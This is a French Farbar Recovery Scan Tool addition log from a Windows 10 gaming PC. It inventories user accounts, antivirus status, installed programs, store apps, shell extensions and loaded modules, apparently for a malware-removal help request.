Format du document : text/plain
Prévisualisation
Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 05-06-2019 01
Exécuté par Luca (06-06-2019 19:29:21)
Exécuté depuis C:\Users\Luca\Desktop
Windows 10 Home Version 1809 17763.503 (X64) (2018-11-27 21:23:48)
Mode d'amorçage: Normal
==========================================================
==================== Comptes: =============================
Administrateur (S-1-5-21-3183337316-3821782573-710669081-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3183337316-3821782573-710669081-503 - Limited - Disabled)
Invité (S-1-5-21-3183337316-3821782573-710669081-501 - Limited - Disabled)
Luca (S-1-5-21-3183337316-3821782573-710669081-1001 - Administrator - Enabled) => C:\Users\Luca
WDAGUtilityAccount (S-1-5-21-3183337316-3821782573-710669081-504 - Limited - Disabled)
==================== Centre de sécurité ========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)
AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
==================== Programmes installés ======================
(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)
7-Zip 18.05 (HKLM-x32\...\7-Zip) (Version: 18.05 - Igor Pavlov)
7-Zip 19.00 (HKLM-x32\...\{23170F69-40C1-2701-1900-000001000000}) (Version: 19.00.00.0 - Igor Pavlov)
AlphaConsole version 9.9.13.0 (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\{CCCDBFCF-CD8B-4728-915A-DCB71C1118BE}_is1) (Version: 9.9.13.0 - AlphaConsole)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.4.1 - Advanced Micro Devices, Inc.)
Apex Legends (HKLM-x32\...\{D7FBF176-382D-484E-863A-DFD1124A2A1C}) (Version: 1.0.1.0 - Electronic Arts, Inc.)
Avast Antivirus Gratuit (HKLM-x32\...\Avast Antivirus) (Version: 19.5.2378 - AVAST Software)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Branding64 (HKLM\...\{EE2AFCE4-0238-4DE0-A140-1647021627C1}) (Version: 1.00.0001 - Advanced Micro Devices, Inc.) Hidden
Call of Duty Black Ops 4 (HKLM-x32\...\Call of Duty Black Ops 4) (Version: - Blizzard Entertainment)
Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Clownfish Voice Changer (HKLM\...\ClownfishVoiceChanger) (Version: - )
Darksiders III The Crucible (HKLM-x32\...\Darksiders III The Crucible_is1) (Version: - )
Discord (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\Discord) (Version: 0.0.305 - Discord Inc.)
DiskProtect9527 version 10.16 (HKLM-x32\...\{BA260FCE-F1C0-42D5-BD87-EB3EDF11252F}_is1) (Version: 10.16 - )
Epic Games Launcher (HKLM-x32\...\{328902CF-CDEF-4124-B1FE-2E4D026C5750}) (Version: 1.1.195.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Far Cry New Dawn (HKLM-x32\...\Uplay Install 5210) (Version: - Ubisoft)
FileZilla Client 3.42.1 (HKLM-x32\...\FileZilla Client) (Version: 3.42.1 - Tim Kosse)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 74.0.3729.169 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Java 8 Update 211 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180211F0}) (Version: 8.0.2110.12 - Oracle Corporation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Microsoft Office Famille et Étudiant 2016 - fr-fr (HKLM\...\HomeStudentRetail - fr-fr) (Version: 16.0.11629.20196 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\OneDriveSetup.exe) (Version: 19.070.0410.0007 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.14.26429 (HKLM-x32\...\{80586c77-db42-44bb-bfc8-7aebbb220c00}) (Version: 14.14.26429.4 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{2D1ED4EA-B59D-4665-ACB3-9325872A300D}) (Version: 1.0.4.0 - Mojang)
MorphVOX Pro (HKLM-x32\...\{2a0101fe-5c87-4a07-86a1-aa818daa5389}) (Version: 4.4.77.16840 - Screaming Bee)
MorphVOX Pro (HKLM-x32\...\{F14B768E-0491-4AC5-B16E-4079BC14AB78}) (Version: 4.4.77.16840 - Screaming Bee) Hidden
MSI Afterburner 4.6.0 (HKLM-x32\...\Afterburner) (Version: 4.6.0 - MSI Co., LTD)
No-IP DUC (HKLM-x32\...\NoIPDUC) (Version: 4.1.1 - Vitalwerks Internet Solutions LLC)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.7 - Notepad++ Team)
NVIDIA PhysX (HKLM-x32\...\{B455E95A-B804-439F-B533-336B1635AE97}) (Version: 9.14.0702 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 23.0.2 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-040C-0000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 10.5.40.26928 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment)
Planet Coaster version 1.3.6.45104 (HKLM\...\Planet Coaster_is1) (Version: 1.3.6.45104 - STEAMPUNKS)
RivaTuner Statistics Server 7.2.1 (HKLM-x32\...\RTSS) (Version: 7.2.1 - Unwinder)
Roblox Player for Luca (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\roblox-player) (Version: - Roblox Corporation)
Roblox Studio for Luca (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\roblox-studio) (Version: - Roblox Corporation)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs OBS 0.12.3 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 0.12.3 - General Workings, Inc.)
The Forest (HKLM-x32\...\The Forest_is1) (Version: - )
theHunter Launcher (HKLM-x32\...\FBDFBE7F-2DB8-47E2-B88E-32F4A2A74AA8_is1) (Version: 819 - Expansive Worlds)
Twitch (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.)
Uplay (HKLM-x32\...\Uplay) (Version: 85.0 - Ubisoft)
WinRAR 5.71 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.71.0 - win.rar GmbH)
Packages:
=========
Adblock Plus -> C:\Program Files\WindowsApps\EyeoGmbH.AdblockPlus_0.9.15.0_neutral__d55gg7py3s0m0 [2019-05-01] (eyeo GmbH)
Candy Crush Friends -> C:\Program Files\WindowsApps\king.com.CandyCrushFriends_1.13.5.0_x86__kgqvnymyfvs32 [2019-05-17] (king.com)
Candy Crush Saga -> C:\Program Files\WindowsApps\king.com.CandyCrushSaga_1.1520.1.0_x86__kgqvnymyfvs32 [2019-06-03] (king.com)
Courrier et calendrier -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20174.0_x64__8wekyb3d8bbwe [2019-05-31] (Microsoft Corporation) [MS Ad]
Dolby Access -> C:\Program Files\WindowsApps\DolbyLaboratories.DolbyAccess_2.4.521.0_x64__rz1tebttyb220 [2019-03-13] (Dolby Laboratories)
Fitbit Coach -> C:\Program Files\WindowsApps\Fitbit.FitbitCoach_4.4.133.0_x64__6mqt6hf9g46tw [2018-11-27] (Fitbit)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_95.1.531.0_x64__v10z8vjag6ke6 [2019-03-19] (HP Inc.)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad]
Microsoft News: les actualités à ne pas manquer -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.30.10924.0_x64__8wekyb3d8bbwe [2019-04-04] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.3.4032.0_x86__8wekyb3d8bbwe [2019-04-09] (Microsoft Studios) [MS Ad]
MSN Météo -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.28.10351.0_x64__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad]
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.93.375.0_x64__mcm4njqhnhss8 [2019-02-19] (Netflix, Inc.)
==================== Personnalisé CLSID (Avec liste blanche): ==========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
CustomCLSID: HKU\S-1-5-21-3183337316-3821782573-710669081-1001_Classes\CLSID\{9EF3A253-D2B1-4474-B7F5-3B9A82E0E7E4} -> [MEGA] => C:\Users\Luca\Documents\MEGA [2019-06-05 19:37]
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [Fichier non signé]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2019-01-27] (Notepad++ -> )
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [Fichier non signé]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2019-03-26] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [Fichier non signé]
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
==================== Raccourcis & WMI ========================
(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)
==================== Modules chargés (Avec liste blanche) ==============
2018-12-24 23:48 - 2018-12-24 23:48 - 098275328 _____ () [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libcef.dll
2018-12-24 23:48 - 2018-12-24 23:48 - 000092672 _____ () [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libEGL.dll
2018-12-24 23:48 - 2018-12-24 23:48 - 003922432 _____ () [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libGLESv2.dll
2015-07-20 17:34 - 2015-07-20 17:34 - 000073728 _____ () [Fichier non signé] C:\Program Files (x86)\No-IP\ducapi.dll
2015-07-20 17:34 - 2015-07-20 17:34 - 000012288 _____ () [Fichier non signé] C:\Program Files (x86)\No-IP\ducservice.exe
2019-04-30 17:59 - 2019-05-25 09:55 - 000015360 _____ () [Fichier non signé] C:\Program Files (x86)\Origin\libEGL.DLL
2019-04-30 17:59 - 2019-05-25 09:55 - 003090944 _____ () [Fichier non signé] C:\Program Files (x86)\Origin\libGLESv2.dll
2018-03-13 04:47 - 2018-03-13 04:47 - 000912896 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-core.dll
2018-03-13 04:47 - 2018-03-13 04:47 - 003109888 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-s3.dll
2015-02-19 01:13 - 2015-02-19 01:13 - 000817152 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\Device.dll
2015-02-19 01:13 - 2015-02-19 01:13 - 003650560 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\Platform.dll
2019-03-26 23:38 - 2019-03-26 23:38 - 000027136 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\RyzenMaster\AUEPRyzenMasterAC.exe
2019-03-26 23:38 - 2019-03-26 23:38 - 000043008 _____ (AMD) [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe
2019-03-26 23:38 - 2019-03-26 23:38 - 000572928 _____ (AMD) [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\AUEPMaster.exe
2019-03-26 23:38 - 2019-03-26 23:38 - 000159232 _____ (AMD) [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\AUEPUF.exe
2018-12-24 23:48 - 2018-12-24 23:48 - 000547840 _____ (The Chromium Authors) [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\chrome_elf.dll
2019-02-09 20:05 - 2019-02-09 20:05 - 000002560 _____ (The ICU Project) [Fichier non signé] C:\Program Files (x86)\Origin\icudt58.dll
2019-04-30 17:59 - 2019-02-09 20:05 - 001252864 _____ (The ICU Project) [Fichier non signé] C:\Program Files (x86)\Origin\icuuc58.dll
2019-04-30 17:59 - 2019-02-09 20:05 - 001548288 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Fichier non signé] C:\Program Files (x86)\Origin\LIBEAY32.dll
2019-02-09 20:05 - 2019-02-09 20:05 - 000395776 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Fichier non signé] C:\Program Files (x86)\Origin\ssleay32.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000030208 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qgif.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000032768 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qico.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000256512 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qjpeg.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000026112 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qtga.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000305152 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qtiff.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000025600 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qwbmp.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000278016 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\mediaservice\dsengine.dll
2019-02-09 20:05 - 2019-05-25 09:55 - 001611264 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 005487104 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Core.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 005841920 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Gui.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000709120 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Multimedia.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 001179136 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Network.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000207360 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Positioning.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000310272 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5PrintSupport.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 003513344 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Qml.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 003390976 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Quick.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000068096 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5QuickWidgets.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000045568 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5TextToSpeech.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000116224 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebChannel.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 054064128 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebEngineCore.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000211456 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebEngineWidgets.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000146432 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 005089792 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000184832 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Xml.dll
2017-09-14 08:37 - 2017-09-14 08:37 - 000026112 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qgif.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000033280 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qicns.dll
2017-09-14 08:37 - 2017-09-14 08:37 - 000027648 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qico.dll
